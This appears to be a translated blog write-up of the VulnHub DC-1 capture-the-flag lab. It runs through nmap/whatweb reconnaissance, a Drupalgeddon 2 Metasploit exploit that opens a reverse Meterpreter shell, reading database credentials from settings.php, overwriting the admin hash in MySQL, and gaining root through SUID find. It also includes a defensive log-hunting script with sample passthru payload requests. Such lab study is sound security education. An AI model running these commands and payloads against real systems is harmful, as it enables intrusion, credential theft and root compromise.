DC-1
⚠️ Security notice
This document is intended only for the following lawful purposes:
- Cyber-security education and academic research
- Authorised penetration testing and security assessment
- Sharing CTF challenge solutions
- Building enterprise security defences
Important reminders:
- The techniques described may only be used on systems you own or have explicit authorisation to test
- Testing other people's systems without authorisation is illegal
- Comply with the Cybersecurity Law (网络安全法) and related laws and regulations
- Practise these techniques in an isolated lab environment
白切菜鸡自成长
Target download: https://download.vulnhub.com/dc/DC-1.zip
Set the network adapters of both the DC-1 VM and the Kali VM to NAT mode so that the two sit on the same subnet.
Reference: "A classic DC-1 walkthrough, this is way too much fun" (经典 DC-1 靶机渗透实战,这渗透也也也太好玩了吧, qq.com)
Information gathering && directory scanning
sudo netdiscover
If nothing shows up, reboot both VMs.
Currently scanning: 172.16.0.0/16 | Screen View: Unique Hosts
23 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1380
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.221.1 00:50:56:c0:00:08 19 1140 VMware, Inc.
192.168.221.2 00:50:56:f0:9f:9f 2 120 VMware, Inc.
192.168.221.137 00:0c:29:32:c5:23 1 60 VMware, Inc.
192.168.221.254 00:50:56:f8:7a:af 1 60 VMware, Inc.
nmap -sV 192.168.221.2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:33 EDT
Nmap scan report for 192.168.221.2
Host is up (0.0091s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
MAC Address: 00:50:56:F0:9F:9F (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.90 seconds
Only port 53 (DNS) is open, so this is probably the wrong IP. In VMware's default NAT layout .2 is the NAT gateway and DNS forwarder, .254 is the DHCP server and .1 is the host's own vmnet8 adapter, none of which is a guest VM. Let's look at .1 anyway.
nmap 192.168.221.1
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:37 EDT
Nmap scan report for 192.168.221.1
Host is up (0.00018s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)
.254 returned nothing, so the next candidate was .1.
Ports 135, 139 and 445 are Windows RPC, NetBIOS and SMB, which is the host machine's virtual adapter rather than a web server, so that is not the target either. The netdiscover output above actually already gave the answer: 00:0C:29 is the OUI VMware assigns to guest VMs, while 00:50:56 addresses belong to VMware's host adapters and NAT services, so .137 was the only real guest on the subnet. After rebooting both VMs a new IP showed up.
nmap 192.168.221.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 02:55 EDT
Nmap scan report for 192.168.221.137
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:32:C5:23 (VMware)
That looks much more like it: SSH, HTTP and rpcbind on a guest-VM MAC.
Open it in a browser and take a look.
![](http://happyprimes.cn/blog/usr/uploads/2025/10/3642732882.png)
nmap -sV <ip> adds service and version detection:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-13 03:01 EDT
Nmap scan report for 192.168.221.137
Host is up (0.000090s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
MAC Address: 00:0C:29:32:C5:23 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.94 seconds
The site is served by Apache.
Next, fingerprint the web stack (server, framework, CMS, JavaScript libraries) and look for end-of-life (EOL) components: EOL software no longer receives patches, so its public vulnerabilities stay exploitable indefinitely.
whatweb -v http://192.168.221.137/
WhatWeb report for http://192.168.221.137/
Status : 200 OK
Title : Welcome to Drupal Site | Drupal Site
IP : 192.168.221.137
Country : RESERVED, ZZ
Summary : Apache[2.2.22], Content-Language[en], Drupal, HTTPServer[Debian Linux][Apache/2.2.22 (Debian)], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PasswordField[pass], PHP[5.4.45-0+deb7u14], Script[text/javascript], UncommonHeaders[x-generator], X-Powered-By[PHP/5.4.45-0+deb7u14]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.2.22 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Content-Language ]
Detect the content-language setting from the HTTP header.
String : en
[ Drupal ]
Drupal is an opensource CMS written in PHP.
Aggressive function available (check plugin file or details).
Google Dorks: (1)
Website : http://www.drupal.org
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Debian Linux
String : Apache/2.2.22 (Debian) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Drupal 7 (http://drupal.org)
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 5.4.45-0+deb7u14
Google Dorks: (3)
Website : http://www.php.net/
[ PasswordField ]
find password fields
String : pass (from field name)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : text/javascript
[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com
String : x-generator (from headers)
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/5.4.45-0+deb7u14 (from x-powered-by string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 13 Oct 2025 15:06:42 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.45-0+deb7u14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 13 Oct 2025 15:06:42 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1760368002"
Content-Language: en
X-Generator: Drupal 7 (http://drupal.org)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2277
Connection: close
Content-Type: text/html; charset=utf-8
- Web server: Apache 2.2.22
- CMS: Drupal 7
- PHP: 5.4.45
All three, like the Debian 7 (wheezy) underneath them that the deb7u14 package suffix reveals, are long past end-of-life.
Finding && exploiting a vulnerability to get a shell
msfconsole
![](http://happyprimes.cn/blog/usr/uploads/2025/10/945228894.png)
msf > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 \_ target: Automatic (PHP In-Memory) . . . .
3 \_ target: Automatic (PHP Dropper) . . . .
4 \_ target: Automatic (Unix In-Memory) . . . .
5 \_ target: Automatic (Linux Dropper) . . . .
6 \_ target: Drupal 7.x (PHP In-Memory) . . . .
7 \_ target: Drupal 7.x (PHP Dropper) . . . .
8 \_ target: Drupal 7.x (Unix In-Memory) . . . .
9 \_ target: Drupal 7.x (Linux Dropper) . . . .
10 \_ target: Drupal 8.x (PHP In-Memory) . . . .
11 \_ target: Drupal 8.x (PHP Dropper) . . . .
12 \_ target: Drupal 8.x (Unix In-Memory) . . . .
13 \_ target: Drupal 8.x (Linux Dropper) . . . .
14 \_ AKA: SA-CORE-2018-002 . . . .
15 \_ AKA: Drupalgeddon 2 . . . .
16 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
17 \_ target: Drupal 7.0 - 7.31 (form-cache PHP injection method) . . . .
18 \_ target: Drupal 7.0 - 7.31 (user-post PHP injection method) . . . .
19 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
20 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
21 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
22 \_ target: PHP In-Memory . . . .
23 \_ target: Unix In-Memory . . . .
24 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
25 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index. For example info 25, use 25 or use exploit/unix/webapp/php_xmlrpc_eval
The second module, Drupalgeddon 2 (SA-CORE-2018-002, CVE-2018-7600), lists targets for both Drupal 7.x and 8.x and has a check, so that is the one to use. (The 2014 `drupal_drupageddon` SQL injection only covers Drupal 7.0 to 7.31 and has no check.)
msf > use exploit/unix/webapp/drupal_drupalgeddon2
Then see which options this module needs:
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
![](http://happyprimes.cn/blog/usr/uploads/2025/10/772713500.png)
Anything with "yes" in the Required column must be set.
RHOSTS (remote hosts): the target IP. TARGETURI: the path Drupal is installed under; / if it lives in the web root, as here.
Set the target IP:
set RHOSTS 192.168.221.137
List the available payloads (the default reverse-TCP Meterpreter is fine here):
msf exploit(unix/webapp/drupal_drupalgeddon2) > show payloads
Launch the exploit:
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.221.138:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (40004 bytes) to 192.168.221.137
[*] Meterpreter session 1 opened (192.168.221.138:4444 -> 192.168.221.137:44708) at 2025-10-13 03:24:20 -0400
meterpreter > ls
Listing: /var/www
=================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 747324309678 fil 188498731153-02-08 21:33:43 -0500 .gitignore
100644/rw-r--r-- 24769076401799 fil 188498731153-02-08 21:33:43 -0500 .htaccess
100644/rw-r--r-- 6360846566857 fil 188498731153-02-08 21:33:43 -0500 COPYRIGHT.txt
100644/rw-r--r-- 6231997547947 fil 188498731153-02-08 21:33:43 -0500 INSTALL.mysql.txt
100644/rw-r--r-- 8048768714578 fil 188498731153-02-08 21:33:43 -0500 INSTALL.pgsql.txt
100644/rw-r--r-- 5574867551506 fil 188498731153-02-08 21:33:43 -0500 INSTALL.sqlite.txt
100644/rw-r--r-- 76712410891717 fil 188498731153-02-08 21:33:43 -0500 INSTALL.txt
100755/rwxr-xr-x 77704548337324 fil 188270147139-03-11 10:02:15 -0500 LICENSE.txt
100644/rw-r--r-- 35180077129727 fil 188498731153-02-08 21:33:43 -0500 MAINTAINERS.txt
100644/rw-r--r-- 23089744188672 fil 188498731153-02-08 21:33:43 -0500 README.txt
100644/rw-r--r-- 41412074677674 fil 188498731153-02-08 21:33:43 -0500 UPGRADE.txt
100644/rw-r--r-- 28363964029388 fil 188498731153-02-08 21:33:43 -0500 authorize.php
100644/rw-r--r-- 3092376453840 fil 188498731153-02-08 21:33:43 -0500 cron.php
100644/rw-r--r-- 223338299444 fil 211037522224-07-25 00:21:02 -0400 flag1.txt
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 includes
100644/rw-r--r-- 2272037700113 fil 188498731153-02-08 21:33:43 -0500 index.php
100644/rw-r--r-- 3019362009791 fil 188498731153-02-08 21:33:43 -0500 install.php
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 misc
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 modules
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 profiles
100644/rw-r--r-- 6704443950617 fil 188498731153-02-08 21:33:43 -0500 robots.txt
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 scripts
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 sites
040755/rwxr-xr-x 17592186048512 dir 188498731153-02-08 21:33:43 -0500 themes
100644/rw-r--r-- 85645942869477 fil 188498731153-02-08 21:33:43 -0500 update.php
100644/rw-r--r-- 9354438772866 fil 188498731153-02-08 21:33:43 -0500 web.config
100644/rw-r--r-- 1791001362849 fil 188498731153-02-08 21:33:43 -0500 xmlrpc.php
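Before moving on, it is worth seeing what the request that just opened that session looks like from the defender's side. The following is an added example written for this page (not code from the original walkthrough, from Metasploit or from Drupal): a small Python hunter for Apache combined-format access logs. It keys on the same thing the SA-CORE-2018-002 fix does, namely input keys that begin with `#`, which the Form API would otherwise merge into a render array as properties such as `#post_render` or `#markup`. The log lines are constructed to mimic the shape of the public Drupal 7 and Drupal 8 exploit requests; the Kali address 192.168.221.138 is reused from the session above, the other addresses, timestamps and sizes are made up.

```python
"""
Drupalgeddon 2 (SA-CORE-2018-002 / CVE-2018-7600) hunting in Apache access logs.

Added example for this walkthrough, not code from the original post or from
Drupal. Signature: the Drupal fix strips every input key that begins with '#',
because such keys were being merged into Form API render arrays as properties
(#post_render, #lazy_builder, #markup, ...). No legitimate client sends them,
so a decoded '#property' inside a parameter name, or inside the element path of
a value, is a reliable indicator from the request line alone, no body needed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format; only the fields used here are captured.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Form endpoints the public exploits (and the Metasploit module) go through.
FORM_PATHS = ("user/password", "user/register", "user/login", "file/ajax")

# Constructed sample, not a real capture. Lines 1-3 mimic the Drupal 7 two-step
# (render property in the query, then the file/ajax callback) and the Drupal 8
# element_parents variant; lines 4-5 are ordinary traffic. 192.168.221.138 is
# the Kali box from the walkthrough; the other addresses are invented.
SAMPLE_LOG = """\
192.168.221.138 - - [13/Oct/2025:03:24:18 -0400] "POST /?q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=id HTTP/1.1" 200 4613 "-" "python-requests/2.31"
192.168.221.138 - - [13/Oct/2025:03:24:19 -0400] "POST /?q=file/ajax/name/%23value/form-AbCdEf HTTP/1.1" 200 73 "-" "python-requests/2.31"
10.0.0.7 - - [13/Oct/2025:03:25:01 -0400] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 210 "-" "curl/8.4"
10.0.0.9 - - [13/Oct/2025:03:26:10 -0400] "GET /?q=user/password HTTP/1.1" 200 3811 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Oct/2025:03:26:30 -0400] "GET /?q=node/1&page=2 HTTP/1.1" 200 7120 "-" "Mozilla/5.0"
"""


def render_properties(target: str) -> list:
    """Return the '#...' tokens smuggled into a request target.

    parse_qsl percent-decodes for us, so %23 becomes '#'. A key such as
    name[#post_render][] is split on the brackets; a value such as
    account/mail/#value or file/ajax/name/#value/... is split on '/'.
    """
    found = []
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        parts = re.split(r"[\[\]]", key) + value.split("/")
        found.extend(p for p in parts if p.startswith("#"))
    return found


def scan(log_text: str) -> list:
    """One alert dict per log line that carries a render property."""
    alerts = []
    for line in log_text.splitlines():
        m = COMBINED_LOG.match(line)
        if not m:
            continue
        props = render_properties(m["target"])
        if not props:
            continue
        decoded_path = unquote(m["target"])
        alerts.append({
            "ip": m["ip"],
            "time": m["ts"],
            "method": m["method"],
            "status": int(m["status"]),
            "properties": props,
            "known_form_path": any(p in decoded_path for p in FORM_PATHS),
        })
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        flag = " (form endpoint)" if a["known_form_path"] else ""
        print(f"{a['time']} {a['ip']} {a['method']} {a['status']} "
              f"{' '.join(a['properties'])}{flag}")
```

Two things to keep in mind when running this over real logs: a raw `#` in a URL is a fragment and never reaches the server, so the indicator is always percent-encoded `%23` in the log; and the Drupal 8 variant carries its `#post_render` in the POST body, which the access log does not record, so for 8.x the `element_parents=.../#value` query string is the part you can still see.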
We have a shell, running as the web server user. The "could not be validated" line only means the check could not confirm the exact version before the payload was sent; the session opened regardless.
ls shows a flag1.txt (the size and timestamp columns above are obviously garbage; ignore them).
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
Modifying data && logging into the site
I asked an AI what this flag is hinting at.
![](http://happyprimes.cn/blog/usr/uploads/2025/10/1608436928.png)
For Drupal 7 the config file is sites/default/settings.php:
cat sites/default/settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
That comment block is flag2:
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
![](http://happyprimes.cn/blog/usr/uploads/2025/10/3852041508.png)
The database credentials from settings.php:
- Username: dbuser
- Password: R0ck3t
- Database: drupaldb
We are still at the Meterpreter prompt; the following drops into a proper shell on the target:
meterpreter > shell -t
[*] env TERM=xterm HISTFILE= /usr/bin/script -qc /bin/bash /dev/null
Process 3415 created.
Channel 3 created.
www-data@DC-1:/var/www$
The classic prompt. Now log in to MySQL with the credentials from settings.php. The database host is localhost and nmap showed no 3306 exposed, so this has to be done from the shell on the box. (A password passed with -p on the command line is visible to other local users in the process list; on a CTF box that does not matter, on a real engagement prefer an interactive prompt.)
mysql -u dbuser -pR0ck3t -D drupaldb
select * from users;
![](http://happyprimes.cn/blog/usr/uploads/2025/10/565580077.png)
To replace admin's password hash we need to know which hashing scheme Drupal 7 uses.
Reference: "How to recover a forgotten Drupal administrator password" (忘记Drupal的管理员密码的解决办法 | Drupal China)
Following that article:
![](http://happyprimes.cn/blog/usr/uploads/2025/10/871168734.png)
php scripts/password-hash.sh 123456
This prints the Drupal 7 hash of the new password 123456. The hash is salted, so every run gives a different `$S$...` string; use the one you get, not the one shown below.
Then change it in MySQL. The database was already selected with -D, but selecting it explicitly does no harm; note that it must be drupaldb (the name from settings.php), since there is no database literally called "database". Copy admin's original pass value from the select output above first, so it can be restored when you are done.
mysql> use drupaldb;
mysql> update users set pass="$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC" where name="admin";
Now we can log in to the site as admin.
![](http://happyprimes.cn/blog/usr/uploads/2025/10/1518514947.png)
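To see what `password-hash.sh` actually computed, here is a Python port of the `$S$` scheme from Drupal 7's includes/password.inc. This is an added example written for this page, not code from Drupal or from the DC-1 box; the function names mirror Drupal's, everything else is the example's own. It lets you mint a replacement `users.pass` value offline, or check a candidate password against a hash pulled from the database without needing the target's PHP. The fourth character of the hash ('D' in the one above) encodes log2 of the iteration count (15, so 2^15 rounds of SHA-512), the next eight characters are the salt, and the rest is the iterated digest in phpass's custom base64, cut to 55 characters.

```python
"""
Drupal 7 password hashing ($S$ scheme, includes/password.inc) ported to Python.

Added example written for this walkthrough; not code from Drupal or the DC-1
box. Scheme: setting = '$S$' + itoa64[count_log2] + 8-char salt; digest =
SHA-512(salt + password), then 2**count_log2 more rounds of
SHA-512(digest + password); output = setting + phpass-base64(digest), cut to
55 characters. Legacy '$P$'/'$H$' (phpass md5) and 'U$' (Drupal 6 upgrade)
values are verified the way user_check_password() does.
"""
import hashlib
import math
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_COUNT = 15        # Drupal 7 default cost; the 'D' in "$S$D..."
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30
DRUPAL_HASH_LENGTH = 55


def _password_base64_encode(data: bytes) -> str:
    """phpass-style base64: 6 bits per char, little-endian packing, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _password_generate_salt(count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """'$S$' + cost character + 8 salt characters (6 random bytes encoded)."""
    count_log2 = min(max(count_log2, DRUPAL_MIN_HASH_COUNT), DRUPAL_MAX_HASH_COUNT)
    return "$S$" + ITOA64[count_log2] + _password_base64_encode(os.urandom(6))


def _password_crypt(algo: str, password: str, setting: str):
    """Core of Drupal's _password_crypt(); returns None where Drupal returns FALSE."""
    if len(password) > 512:              # Drupal's guard against huge passwords
        return None
    setting = setting[:12]               # the setting string is the first 12 chars of a hash
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12]
    pw = password.encode()
    digest = hashlib.new(algo, salt.encode() + pw).digest()
    for _ in range(1 << count_log2):     # PHP: do { ... } while (--$count)
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _password_base64_encode(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)   # 98 chars for SHA-512
    return output[:DRUPAL_HASH_LENGTH] if len(output) == expected else None


def user_hash_password(password: str, count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """What `php scripts/password-hash.sh <password>` prints on Drupal 7."""
    return _password_crypt("sha512", password, _password_generate_salt(count_log2))


def user_check_password(password: str, stored_hash: str) -> bool:
    """Verify a candidate password against a users.pass value."""
    if stored_hash.startswith("U$"):     # Drupal 6 hash re-wrapped on upgrade: md5 first
        stored_hash = stored_hash[1:]
        password = hashlib.md5(password.encode()).hexdigest()
    algo = {"$S$": "sha512", "$P$": "md5", "$H$": "md5"}.get(stored_hash[:3])
    if algo is None:
        return False
    return _password_crypt(algo, password, stored_hash) == stored_hash


if __name__ == "__main__":
    new_hash = user_hash_password("123456")
    print(new_hash)                                    # fresh salt, so a new value every run
    print(user_check_password("123456", new_hash))     # True
```

The 2^15 SHA-512 rounds are the whole point of the cost character: a single check is cheap, but guessing against a dumped `users` table is slow, which is what the flag2 hint about brute force and dictionary attacks is alluding to. With database write access none of that matters, which is why overwriting the hash works.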
flag3, shown on the site once logged in as admin:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Exploiting a system weakness && escalating privileges
I asked an AI about the flag3 text.
![](http://happyprimes.cn/blog/usr/uploads/2025/10/4261849607.png)
PERMS, FIND and -exec point at SUID binaries. List them (regular files only, and discard the permission-denied noise):
/var/www$ find / -perm -4000 -type f 2>/dev/null
find itself is SUID root: the set-user-ID bit makes it run with root as its effective UID no matter who invokes it, and its -exec action runs an arbitrary command with that same effective UID.
/usr/bin/find /etc/passwd -exec whoami \;
It prints root, confirming the escalation works.
/usr/bin/find /etc/passwd -exec /bin/bash -p \;
The -p matters: without it bash notices that the effective UID differs from the real UID and drops back to www-data.
![](http://happyprimes.cn/blog/usr/uploads/2025/10/1217661892.png)
With root we can read /root.
The final flag:
bash-4.2# cd /
bash-4.2# cd root
bash-4.2# cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
As a plain www-data user, /root is not accessible:
![](http://happyprimes.cn/blog/usr/uploads/2025/10/1132785048.png)
Summary
After joining the LAN:
Scan for hosts on the same subnet
sudo netdiscover
Scan the target's ports
nmap -sV [target ip]
Fingerprint the web stack
whatweb http://[target ip]/
Exploit the vulnerability
msfconsole
# search for the outdated component
msf > search drupal
# select the exploit
msf > use exploit/unix/webapp/drupal_drupalgeddon2
# list the required options
msf exploit(unix/webapp/drupal_drupalgeddon2) > show options
# fill in the required options
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS [target ip]
# list payloads (optional)
msf exploit(unix/webapp/drupal_drupalgeddon2) > show payloads
# run it
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Get a shell
shell -t
Read the config
cat sites/default/settings.php
Log in to MySQL
mysql -u [user] -p[password] -D [database]
Generate a hash in the scheme the application uses
php scripts/password-hash.sh 123456
Replace the stored password hash
mysql> use drupaldb;
mysql> update users set pass="$S$D9n2ArcXobfFvuoCXXK4c4tz93ndGPLdEOMqZ9brSnwhJjwFagtC" where name="admin";
Privilege escalation
# list SUID binaries
/var/www$ find / -perm -4000 -type f 2>/dev/null
# confirm find runs as root
/usr/bin/find /etc/passwd -exec whoami \;
# spawn a root shell through find (-p keeps the effective UID)
/usr/bin/find /etc/passwd -exec /bin/bash -p \;